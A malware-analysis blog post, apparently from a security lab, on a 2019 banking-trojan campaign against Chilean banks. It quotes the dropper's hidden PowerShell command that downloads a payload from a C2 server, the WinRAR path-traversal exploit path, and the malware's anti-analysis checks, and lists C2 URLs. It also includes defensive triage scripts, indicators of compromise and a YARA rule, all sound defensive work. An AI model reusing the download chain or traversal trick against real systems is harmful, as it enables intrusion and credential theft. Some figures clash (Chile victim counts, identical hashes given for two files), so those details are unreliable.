
An EMOTET wave in Chile targeted financial and banking services. SI-LAB identified hundreds of users impacted by this malware between March 18th and 26th, 2019.

The last days of March 2019 made headlines because of a targeted cyber attack involving a new variant of the infamous EMOTET malware. EMOTET is known as a banking trojan: it injects malicious code into the victim's computer in order to collect financial information.

EMOTET's delivery has evolved over time; this wave, however, used its most common form: malicious documents or URL links inside the body of an email, often disguised as an invoice or PDF attachment.

According to SI-LAB, a total of 176 users in Chile were affected by a broad campaign that ran between March 18th and 26th, 2019. Once again, the main goal of this EMOTET campaign was to exfiltrate credentials from victims' computers in order to access financial and banking services located in Chile.

The first stage, a file named "__Denuncia_Activa_CL.PDF.bat", drives the crucial part of this threat. It was delivered via malspam campaigns around the world, and its source code is obfuscated to evade antivirus detection and complicate analysis.

Interestingly, at the time of analysis the first stage had zero detections on VirusTotal (VT). With that, the criminals achieved a rule of thumb of the malware landscape: no detection. An old living-off-the-land technique, a batch script that only drives tools already present on the system, made it fully undetectable (FUD), the ultimate goal for malware authors.

The .bat file is a Windows batch script that downloads the second stage from the command and control (C&C) server: a RAR archive that leverages the WinRAR/ACE vulnerability (CVE-2018-20250) to drop the malware itself into the Windows Startup folder. The script then reboots the infected machine, after which the malware starts with the system and remains persistent.

The high-level workflow of this campaign is illustrated below.

[Diagram: high-level workflow of the EMOTET campaign]

EMOTET was protected with the commercial packer Themida, which adds a protection layer that makes analysis considerably harder. The authors also built in restrictions to stop the sample from running in unwanted environments; in this case they added anti-run checks on the victim's geolocation and language preferences, so only computers with Spanish (Chile) settings were compromised.

Themida offers a large set of features that criminals value for protecting their payloads: VM protection (selected code blocks run inside a custom virtual machine), anti-debugging, anti-monitor techniques against file and registry monitors, and anti-memory-patching, among others (see all Themida features here).

The first alert about this wave was issued on March 22nd by the Computer Security Incident Response Team (CSIRT) of Chile's Ministry of the Interior.

“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.

“Based on information obtained from internal sources, the cybersecurity alert situation was identified through an incident related to malicious software called EMOTET that affected relevant sectors of the economy” – CSIRT Chile.

 

CSIRT released a list of IP addresses associated with EMOTET that should be blocked. The national alert (below) can be consulted at this URL.

[Image: national alert issued by CSIRT Chile]

A further alert was shared by the Chilean CSIRT on March 23rd, 2019.

SI-LAB found that this attack started some days before the alerts were published. The second stage (denuncias.rar), which exploits the WinRAR/ACE vulnerability (CVE-2018-20250) to drop the malware itself, was uploaded by the criminals to the open-directory (opendir) C2 server on March 18th, 2019. As shown below in the Technical Analysis, the file was uploaded again to another web folder on March 21st, perhaps an update by its operators to add functionality or fix a bug.

[Screenshot: opendir listing showing the denuncias.rar upload dates]

As mentioned, EMOTET only runs on computers whose primary language is set to Spanish (Chile); this locale check is itself a strong indicator of a targeted attack.

After several rounds of analysis, we found that the following Chilean financial and banking organizations were targeted:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

 

[Screenshot: targeted bank names found in the sample]

When the malware runs unrestricted, i.e. outside a virtualized environment, it sends some information about the victim's computer to the C2 server: date and time of infection, the victim's public IP address, OS version and antivirus product name.

[Screenshot: infection data received by the C2 server]

This information was exposed on the opendir C2 server, and SI-LAB analysed it to establish how many infections and victims this targeted attack produced.

In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.

We built a GeoMap of Threats that aggregates the victims' IP addresses collected from the opendir C2 server by geolocation. Colour intensity is proportional to the number of infections, the darkest red corresponding to 175 infections in Chile.

 

GeoMap of Threats: EMOTET victims of the cyber threat in Chile

As the GeoMap of Threats shows, Chile, the USA, Germany and France were the countries with the most hits observed by SI-LAB. Of the 1089 infections, 175 were in Chile, 162 in the USA, 137 in Germany and 132 in France.

Chile's national CSIRT and National Cybersecurity System are currently fighting this growing threat and working to raise awareness among users in the country. They encourage users to follow their computer security alerts.

For more details and complete analysis of this malicious campaign see the Technical Analysis below.

 

 

Technical Analysis


Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


The last weeks of March 2019 made headlines for the wrong reasons: a cyber threat targeted financial institutions and banks in Chile via the EMOTET banking trojan.

The campaign started with a malspam wave carrying malicious documents or URL links in the body of an email, often disguised as an invoice or PDF attachment.

According to SI-LAB, 1089 users were impacted by this wave, 176 of them in Chile. The malware is not new and, once again, the main goal was to exfiltrate credentials from users' computers in order to access financial and banking services located in Chile.

The first stage, "__Denuncia_Activa_CL.PDF.bat", orchestrates the whole, carefully planned operation. It was delivered via malspam campaigns around the world, and its code is obfuscated to evade antivirus detection and hinder analysis. Figure 1 (below) shows the batch script, stored as little-endian UTF-16 text.

Figure 1: The obfuscated first stage, a batch script encoded in little-endian UTF-16.

 

After some decoding rounds it was possible to recover the batch script as plain ASCII; Figure 2 shows the result.

Figure 2: The deobfuscated first stage.
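The decoding step is easy to automate. The Python script below is an added example, not code from the original analysis: it detects the UTF-16 encoding (with or without a byte-order mark), recovers the batch text and pulls out what matters for triage, namely the `set` variables, any URLs (defanged for sharing) and the download/extract/delay/reboot behaviours described in the steps that follow. It also handles plain 8-bit scripts. The embedded sample is a constructed, harmless stand-in with a placeholder URL (example.invalid); it is not the campaign's file.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a harmless stand-in for the first-stage .bat, stored the way the
# real one was (UTF-16LE with a byte-order mark). The URL is a placeholder, not an
# indicator from the campaign.
SAMPLE_BAT = b"\xff\xfe" + (
    "@echo off\r\n"
    "set downloadurl=http://example.invalid/wp-content/uploads/denuncias.rar\r\n"
    "set downloadpath=%USERPROFILE%\\Downloads\r\n"
    "set arch=25RqcZpQ3.rar\r\n"
    "PowerShell -windowstyle hidden -Command \"(New-Object Net.WebClient)"
    ".DownloadFile('%downloadurl%', '%downloadpath%\\%arch%')\"\r\n"
    "\"%ProgramFiles%\\WinRAR\\WinRar.exe\" x -y \"%downloadpath%\\%arch%\" \"%downloadpath%\"\r\n"
    "ping 127.0.0.1 -n 1 > nul\r\n"
    "shutdown -r\r\n"
).encode("utf-16-le")

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)

# Behaviours from the walk-through of the first stage, as regexes over the decoded text.
SUSPICIOUS = {
    "download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|bitsadmin", re.I),
    "archive_extract": re.compile(r"winrar\.exe|unrar\b|7za?\.exe", re.I),
    "delay": re.compile(r"^\s*ping\s+127\.0\.0\.1", re.I | re.M),
    "reboot": re.compile(r"^\s*shutdown\s+[-/]r\b", re.I | re.M),
    "hidden_window": re.compile(r"-windowstyle\s+hidden|-w\s+hidden", re.I),
}


def decode_script(raw: bytes) -> str:
    """Recover the text of a .bat that may be UTF-16 (either byte order) or 8-bit."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    # No BOM: UTF-16LE ASCII text has a NUL in every second byte.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def defang(url: str) -> str:
    """hxxp://host[.]tld/path, so the indicator cannot be followed by accident."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return scheme.lower().replace("t", "x") + "://" + host.replace(".", "[.]") + sep + path


@dataclass
class BatchTriage:
    variables: dict = field(default_factory=dict)
    urls: list = field(default_factory=list)
    behaviours: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        staged = "archive_extract" in self.behaviours or "reboot" in self.behaviours
        if "download" in self.behaviours and staged:
            return "stage-1 downloader/dropper pattern"
        return "no downloader pattern"


def triage_batch(raw: bytes) -> BatchTriage:
    """Decode the script and collect variables, defanged URLs and matched behaviours."""
    text = decode_script(raw)
    result = BatchTriage()
    for m in re.finditer(r"^\s*set\s+\"?([A-Za-z_]\w*)=([^\r\n]*)", text, re.I | re.M):
        result.variables[m.group(1).lower()] = m.group(2).strip()
    result.urls = sorted({defang(u) for u in URL_RE.findall(text)})
    result.behaviours = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
    return result


if __name__ == "__main__":
    t = triage_batch(SAMPLE_BAT)
    print("variables :", t.variables)
    print("urls      :", t.urls)
    print("behaviours:", t.behaviours)
    print("verdict   :", t.verdict)
```

Run it against a real sample by reading the file in binary mode and passing the bytes to `triage_batch`; the variables dictionary is useful because the download URL is usually assembled from `set` values rather than written out in one piece.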

 

In general, the malicious batch script performs the following actions:

1. Generates a random name for the 2nd stage (dropper)

First, the script generates a random name for the second file downloaded from the C2 server, the stage that exploits the WinRAR/ACE vulnerability (CVE-2018-20250) and drops EMOTET itself into the Windows Startup folder (discussed later).

In detail, lines 33, 34 and 35 of Figure 2 show the second stage being downloaded to the victim's Downloads folder. The next image shows the output produced by the batch file.

Figure 3: Output of the first-stage script.

 

2. Downloads the 2nd stage: a PowerShell command fetches the 'denuncias.rar' archive, which carries the WinRAR exploit.

PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('%downloadurl%'

 

The 2nd stage is downloaded from the C2 server, renamed ("25RqcZpQ3.rar") and placed in the "C:\Users\root\Downloads" folder.

Figure 4: Download path used by the first stage.

 

As shown, this file is served from an opendir C2 server, which has it available in two different directories:

http://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
http://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar (URL hardcoded in the 1st stage)

Figure 5: The 2nd stage available for download in two different directories.

 

3. Extracts EMOTET via WinRAR: after the 2nd stage ('denuncias.rar') has been downloaded, the archive is extracted with WinRAR and, through the ACE vulnerability, the payload ('Integrity.exe', EMOTET) is written to the Windows Startup folder; see lines 38 to 42 in Figure 2.

"%ProgramFiles%\WinRAR\winRar.exe" x -y -c "%downloadpath%\%arch%" "%downloadpath%"

 

4. Pings localhost to introduce a short delay

ping 127.0.0.1 -n 1 > nul

 

5. Reboots to activate persistence

Once shutdown -r is executed, Windows reboots. Because the 2nd stage placed EMOTET in the Startup folder, the payload runs at the next logon, which gives the malware its persistence. A normal reboot by the user would have the same effect, but for some reason this campaign does not wait for the user to initiate it.

Upon reboot, the malicious program "Integrity.exe" (EMOTET) gets into action and connects to the command and control (C&C) server.

Figure 6: Infection graph extracted from VirusTotal.

 

As noted above, at the time of analysis the first stage had zero detections on VirusTotal (Figure 7). The script only chains tools already present on the system (PowerShell, WinRAR, ping, shutdown), an old living-off-the-land technique that left it fully undetectable (FUD), the ultimate goal for malware authors.

Figure 7: No detections identified by VT.

 

 

2nd stage — The dropper uses the WinRar/ACE vulnerability to distribute EMOTET


Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


Looking inside the dropper, we can observe some interesting artifacts.

Figure 8: Hex dump of the 'denuncias.rar' file, the EMOTET dropper.

 

As shown, the string "C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe" is present in the archive's file header. This is CVE-2018-20250 saying "hello world, I'm here!" 🙂

In detail, the ACE file header carries a path that starts with "C:../". The vulnerable unacev2.dll shipped with WinRAR did not reject it, so the ".." component is honoured and the file is written one level above the extraction directory. With the archive extracted from the Downloads folder, the path resolves into the user's own profile, i.e. a Startup folder that is writable without administrative privileges:

C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe
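The path arithmetic behind this is easy to reproduce. The Python snippet below is an added example, not code from the original post or from WinRAR: it resolves the entry name recovered from the archive against the Downloads folder the way a naive extractor would (join, then normalise) and shows the containment check a hardened extractor must apply before writing any entry. It goes slightly beyond the one case in the text by also covering plain "..\" traversal, absolute paths and a different drive letter. Using `ntpath` keeps Windows path semantics (including the drive-relative "C:..\" form the exploit abuses) even when the script runs on Linux. The space in "Start Menu" follows the extracted path quoted above, not the dotted rendering of the hex dump.

```python
import ntpath

# Extraction directory from the analysis: the archive was saved to the victim's Downloads.
DEST_DIR = r"C:\Users\root\Downloads"

# Entry name recovered from the dropper's ACE header (Figure 8). The space in
# "Start Menu" follows the extracted path quoted in the text.
ACE_ENTRY = r"C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe"


def resolve_entry(dest_dir: str, entry_name: str) -> str:
    """Where a naive extractor (join, then normalise) writes an entry.

    ntpath is used deliberately so Windows semantics, including the drive-relative
    form 'C:..\\x' that the exploit abuses, hold on any host running this script.
    """
    return ntpath.normpath(ntpath.join(dest_dir, entry_name))


def is_safe_entry(dest_dir: str, entry_name: str) -> bool:
    """The check a hardened extractor performs before writing: the resolved path
    must stay under dest_dir. Different drive letters make commonpath raise."""
    dest = ntpath.normpath(dest_dir)
    target = resolve_entry(dest, entry_name)
    try:
        return ntpath.commonpath([dest, target]) == dest
    except ValueError:
        return False


def audit_entries(dest_dir: str, entry_names):
    """One record per archive entry: resolved path and whether extraction is safe."""
    return [{"entry": name,
             "resolved": resolve_entry(dest_dir, name),
             "safe": is_safe_entry(dest_dir, name)} for name in entry_names]


if __name__ == "__main__":
    # Constructed entry names alongside the real one from the sample.
    sample_entries = ["denuncias\\documento.pdf", ACE_ENTRY, "..\\..\\Windows\\x.exe", "D:\\x.exe"]
    for rec in audit_entries(DEST_DIR, sample_entries):
        flag = "OK   " if rec["safe"] else "BLOCK"
        print(f"{flag}  {rec['entry']}  ->  {rec['resolved']}")
```

The benign entry stays inside Downloads; the ACE entry resolves to the Startup path shown above and is rejected, which is exactly the validation that the fixed WinRAR builds (which dropped ACE support altogether) no longer need to perform.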

 

Extracting all the files, we can obtain and analyse the malware itself.

Figure 9: EMOTET malware ('Integrity.exe') dropped by the 2nd stage.

 

More details on CVE-2018-20250 here.

 

 

EMOTET / Integrity.exe


Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08


Digging into the final infection stage, we are facing the EMOTET banking trojan, a credential stealer that has been infecting users in Chile in recent months.

At first glance, the malware is protected with the packer Themida 2.x. This is bad news for malware analysts.

Unpacking Themida, especially the newer versions, is no small task. Themida runs parts of the protected program inside an extremely complex virtual machine, combined with practically every anti-debug and anti-analysis trick in the book and several layers of obfuscation.

Because different parts of the code execute inside virtual machines, the behaviour of the target program is obscured. The most thorough way to unpack a VM-protected binary like this is to devirtualize it: recover the instruction set of the packer's virtual machine and write a script that translates that bytecode back into native code.

 

Figure 10 shows that the binary was built with Delphi; nonetheless, we did not attempt to fully unpack and decompile it, because defeating Themida is an extremely complex task.

Figure 10: Packer and compiler detected: Themida 2.x and Delphi.

 

Two more signs of the packer can be seen in the two entropy figures below: some sections have blank names, and others have an entropy close to the maximum of 8.0 bits per byte. This is a clear signal that we are facing a challenge: the Themida packer!

Figure 10: EMOTET section entropy.

 

Figure 11 below shows the entropy across the whole file; the flat, near-maximal plateau through the middle indicates that most of the file is packed.

Figure 11: EMOTET file entropy.

 

Another clear indicator of Themida is the PE import table (IAT): it has been largely destroyed and only a single kernel32.dll import remains, lstrcpy. Themida resolves the real imports at run time, so the static import table tells the analyst almost nothing about what the program does.

Figure 12: EMOTET IAT (result of the Themida packer).
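The two static indicators discussed above (blank section names and near-maximal entropy) are quick to check without a full PE library. The following is an added example, not part of the original analysis: a minimal PE section-table walker with per-section Shannon entropy and a packer heuristic, run against a constructed three-section PE32 image that is built inline so the script works offline. The constructed image is not Integrity.exe and is not executable; the 7.0-bit threshold is a common rule of thumb, not a value from the article.

```python
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(blob: bytes):
    """Walk the PE section table and yield (name, raw_offset, raw_size)."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    (num_sections,) = struct.unpack_from("<H", blob, coff + 2)
    (opt_size,) = struct.unpack_from("<H", blob, coff + 16)
    table = coff + 20 + opt_size                         # first IMAGE_SECTION_HEADER
    for i in range(num_sections):
        off = table + 40 * i
        name = blob[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", blob, off + 8)
        yield name, raw_ptr, raw_size


def triage_sections(blob: bytes, packed_threshold: float = 7.0):
    """Per-section entropy plus the two packer tells discussed in the text:
    blank section names and near-maximal entropy."""
    report = []
    for name, raw_ptr, raw_size in pe_sections(blob):
        ent = shannon_entropy(blob[raw_ptr:raw_ptr + raw_size])
        report.append({"name": name, "entropy": round(ent, 3),
                       "blank_name": name == "",
                       "high_entropy": ent >= packed_threshold})
    return report


def looks_packed(report) -> bool:
    return any(s["blank_name"] or s["high_entropy"] for s in report)


def build_sample_pe(sections) -> bytes:
    """Constructed input: a minimal PE32 image (DOS stub, COFF header, zeroed
    optional header, section table, section data). Not executable, not Integrity.exe."""
    align = 0x200
    opt = bytearray(224)                              # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)             # Magic = PE32
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    headers_end = 0x40 + 4 + len(coff) + len(opt) + 40 * len(sections)
    first_raw = (headers_end + align - 1) // align * align
    table, body, raw_ptr, va = bytearray(), bytearray(), first_raw, 0x1000
    for name, data in sections:
        raw_size = (len(data) + align - 1) // align * align
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), len(data), va,
                             raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += (raw_size + 0xFFF) // 0x1000 * 0x1000
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew -> PE signature
    image = dos + b"PE\0\0" + coff + opt + table
    return bytes(image.ljust(first_raw, b"\0") + body)


SAMPLE_PE = build_sample_pe([
    (".text", b"mov eax, 1 ; ret\r\n" * 128),   # ordinary code-like bytes, low entropy
    ("", bytes(range(256)) * 16),                # blank name and uniform bytes (8.0 bits)
    (".rsrc", b"\0" * 0x200),                    # constant padding, 0.0 bits
])

if __name__ == "__main__":
    rep = triage_sections(SAMPLE_PE)
    for s in rep:
        print(f"{s['name'] or '<blank>':8} entropy={s['entropy']:5.3f} "
              f"blank={s['blank_name']} high={s['high_entropy']}")
    print("packer suspected:", looks_packed(rep))
```

On a real sample, read the file in binary mode and pass the bytes to `triage_sections`; a Themida-protected Delphi binary typically shows several sections near 8.0 bits with blank or non-standard names, whereas an unpacked Delphi executable has a .text section around 6.0 to 6.5 bits and the usual .data/.idata/.rsrc names.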

 

Digging into the details

Themida is a constant challenge for malware analysts. The approach we used to inspect the sample was to dump it from memory while it was running. Bear in mind that Themida devirtualizes only small pieces of code at a time during execution, and that its anti-monitor techniques also detect file and registry monitors.

First, the virtual machine had to be tuned to simulate the infection scenario as realistically as possible: we changed the system language preferences to Spanish (Chile) and adjusted a few values in the Windows Registry that the malware reads to detect analysis environments.

Figure 13: Changes to the SystemBiosDate and VideoBiosVersion values under HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System.

 

But nothing is perfect. The malware constantly checks the processes and windows present on the system and terminates if any of the following is found (an evasion technique of the Themida packer, documented here). This is one of the many features of this modern packer.

indicators = [
                "OLLYDBG",
                "GBDYLLO",
                "pediy06",
                "FilemonClass",
                "File Monitor - Sysinternals: www.sysinternals.com",
                "PROCMON_WINDOW_CLASS",
                "Process Monitor - Sysinternals: www.sysinternals.com",
                "RegmonClass",
                "Registry Monitor - Sysinternals: www.sysinternals.com",
                "18467-41",
]

 

Back to EMOTET: after dumping it from memory we could observe some of the imported DLLs and the malware strings.

Only a few blocks of EMOTET can be analysed, because Themida runs the code inside its virtual machine and devirtualizes functions on the fly; for the same reason the IAT cannot be fully rebuilt.

Figure 14: DLLs imported by EMOTET, and the anti-VM and anti-debug techniques detected in this memory dump.

 

Note that after the dump only some of the DLL imports are rebuilt; we suspect the others remain hidden. Anti-VM and anti-debug techniques were detected again in the dumped image. Nothing new here! 🙁

Some information can nonetheless be extracted from the binary. When executed on a victim's computer, it sends an initial beacon (a kind of "EHLO" message with a few parameters) to the C2 server.

Figure 15: E
MOTET C2 server URL.

 

Information sent includes:

  • Date/hour of infection
  • Victim IP Address
  • Windows OS version
  • Antivirus name

 

Figure 16 shows the query the malware runs to identify the antivirus product installed on the infected machine. "winmgmts" is the WMI service moniker; the WMI service itself runs inside an SVCHOST process under the LocalSystem account.

Figure 16: EMOTET collects the antivirus product name via a WMI query.

 

The server-side script "up.php" appends every entry to a file called "tictic.txt". Each time a victim is infected, the EHLO request is sent to "up.php", which writes the infection data listed above into that file.

Figure 17: EMOTET C2 files exposed in an opendir.

 

This file, exposed in the opendir C2, is what allowed us to build the GeoMap of Threats presented at the beginning of the article.

After processing the data we counted 1089 infected users during this campaign. As noted, Chile, the USA, Germany and France had the most hits: of the 1089, 175 victims were in Chile, 162 in the USA, 137 in Germany and 132 in France.

One important question remains: what kind of data does this banking trojan collect? Banking credentials, of course.

 

EMOTET drops a sqlite3.dll during execution and uses it to read data from the SQLite databases of the popular web browsers installed on the machine.

Figure 18: EMOTET collects data from the most popular web browsers.

 

During static analysis it was also possible to observe the targeted banks and financial institutions, namely:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

Figure 19: Banks and financial institutions targeted in this attack.

 

Figure 20 (below) shows one of the administration panels used by EMOTET in its recent infections.

Figure 20: Administration panel used by recent EMOTET variants.

 

Another interesting aspect is the following string, observed in past EMOTET infections and hardcoded in many samples.

C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

 

This is a drag-and-drop interface support unit from the TMS (v7) components for Delphi 5, 6, 7, 2005, 2006 and C++Builder. We could not retrieve any further information about this library from the malware.

During the analysis we also observed several connections to "www.bing.com", probably to check that the Internet connection works.

Figure 21: Internet connectivity check during EMOTET execution.

 

Curiously, across several memory dumps we saw some interesting strings change in memory. At one specific moment we captured the following:

75EE6DE16BB9D5BE439A3EF523A83AFA
BICE
C852CE43C4D6371C2DA82AD878D20420
64FF1C0E1F0D0962E878D57DAAF36980E903B51530D0
B2ADBB5BD210030E1B6C82E6524BA740EE6D9E
2E29C77CA62FA75D8ADC7FB690C8D87B9732E37C97B84983D8CF5F9449ED
BBVA
50C560964C889B83EF71E713C11243F21DBE6FBE4A85A922
212DC56494CF022FDC79D7B3B214B971D8123297FD003291CF
D97482A059F06188A526A28681C20823
C650E40229AAF90830A3AD
ITA
CC57EF022BAC2F04297BF728CFF324C360E71EBC6183A5
8C94A257F056F65CF1205A8AAD918191B71DCA013EDE01
64F00236E66EFC240866E60A359A
A1A85B9C5CF95BF72775C2A6AE29A75C8297AF20C4788ACC075B83
SANTA
5DF40FD0084580AA52405E3A3AA221D30A1F37A95287BB1EB42DD1BC43F3053D94
59F50E2BDC72D5BEA7F50B28D00D4C3BC71CCF759C4AFD57FF171431D91EDB
64FF34F315499D
B8509C5B8C9E2B00094487BD65E173B198F054A743F007425490BF6394AD44E47CA48587AE4DEE03
AAB671B06FE66981B8EA2B0F17419F548A9FB728DC1022A43F9348252BCB6D95CC
ACB74CEB034053DD01418280A72FA253
CORP
D945F333DA788E49F161F622046DE2023C9E489846
ESTADO
5FF80F2CC30175A35487D80C6A83D81CC60334A45233FC294485A049F139
8E89BF7FAE2C42FE3F92C571D71146EF2AAC5E8E4829F6235383BF6E8CF4023C6AFCAB55FB08
BCA75C9BB21066924B9E30DBBD32AB5883C768E41FD065EC78DC
3FD86F8CA3215583BB2FA05432BB11D5025201538CED60F95CF911C96883
61FA0926C5077FB962F16590F61D0D053B9E5488B15296
948FA545E466B551FA295F83AA2EA3
CHILE
2A23DD01389537D30B19A68282DA798BB3E60E42282AC11FBD14
50F926C264D2C1599E3E90F464BD30C67CEA1F0E38DCAFC619B56C9C
8C85A145F565E248C11DBE759C29BA79
BE87512029A426D375DA0FC6A02474E10A4DF5543EE31A0E67F82CD578
2F28DC1A31928188A723
BCI
9883B34C36AB2B0061B3CB7DAB27BC6781C1
64FF36CEA2C015CC0C4984A1534AF640CB18C316CFAEA333AA
FB679F58344B8BB06FE6698E4789C86BC20A6F80AB5BED69BF35D60D
B1AA5996B517041CCD034BF925A02A
SECU
44DF14D37BD8CB59F65181A74B8ECA7BEE3AD90A32D465B121B8964E7FB543E83FEE4EF826D91EC7789AB12B5E83EE13B563F831CC
FALA
F36F85A24A8B9895BA1545E30F429E57
F41C28DE021050FE2AAD13C6A0CE0431C81FDD
WebPay
2727D96DF161E9
E9649C5E983093BF6BAB3CEF1B0277B49D3EE66085B685C1074E8CA04E36C264B2698BBD6C8AFD34EF53F36D9A4FFD5383A9FD1725D7134124
ServiPag
F8152FF02BA624CE7A9ACE7AA1
2932CE659F24BA6287D97AA98F3565F01BBC65E54CDE11B41FBF6F9CBE75B8
SCOTI
A8B67C8CB629BD7AD62EA85D89D77B8BB7

 

These appear to be encrypted strings interleaved with fragments of bank names (BICE, BBVA, ITA, SANTA, CORP, ESTADO, CHILE, BCI, SECU, FALA, WebPay, ServiPag, SCOTI); the encrypted parts may hold bank-specific information such as endpoints, but we could not confirm it.

The only way to understand the malware completely is to devirtualize the entire code. As shown, Themida makes analysis much harder, and that was the biggest challenge in this investigation.

 


Thank you to all who contributed to this analysis:

-National CSIRT at Chile @CSIRTGOB
-João Arnaut
-hasherezade @hasherezade
-1ZRR4H @WWWSecurity


 

Indicators of compromise (IOC)

Hashes

Batch script:
9008b75ac8bbaacbda0dc47bb7d631f1c791cb346cc6f6a911e7993da0834c09
1e541b14b531bcac70e77a012b0f0f7f
0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81

RAR archive:
b5a84e8079dc8558d3960d711d8591500b69cf79e750ecaf88919e398c59383f
1e541b14b531bcac70e77a012b0f0f7f
0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81

Malware Payload (EMOTET):
421448d92a6d871b218673025d4e4e121e263262f0cb5cd51e30853e2f8f04d7
98172becba685afdd109ac909e3a1085
cbb0377ec81d8b120382950953d9069424fb100e

Domains and URLs (defanged)

triosalud[.]cl
hxxp://5.39.218[.]210/dns/dns.php?dns=<random>
hxxp://5.39.218[.]210/dns/logs/logpc.php
hxxp://185.29.8[.]45/1.exe
hxxp://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
hxxp://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar
hxxps://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/tictic.txt
hxxps://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/up.php

More IPs available here.

 

Other interesting string

C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

 

Yara rule

import "pe"

rule EMOTET_Chile {
  meta:
    description = "Yara rule for EMOTET Chile - April version"
    author = "SI-LAB - https://seguranca-informatica.pt"
    last_updated = "2019-04-10"
    tlp = "white"
    category = "informational"

  strings:
    $emotet_chile_a = {31 A8 31 AC 31 B0 31 28}
    $emotet_chile_b = {00 69 00 67 00 52 00 65 00 64}
    $emotet_chile_c = {44 65 6C 70 68 69}
    $emotet_chile_d = {64 76 33 48 82 48 46 38 5C 08 B0 25}

  condition:
    all of ($emotet_chile_*) and
    pe.number_of_sections == 6 and
    pe.version_info["CompanyName"] contains "BigRed" and
    pe.version_info["OriginalFilename"] contains "BigRed" and
    pe.version_info["FileDescription"] contains "BigRed"
}

The Yara rule is also available on GitHub.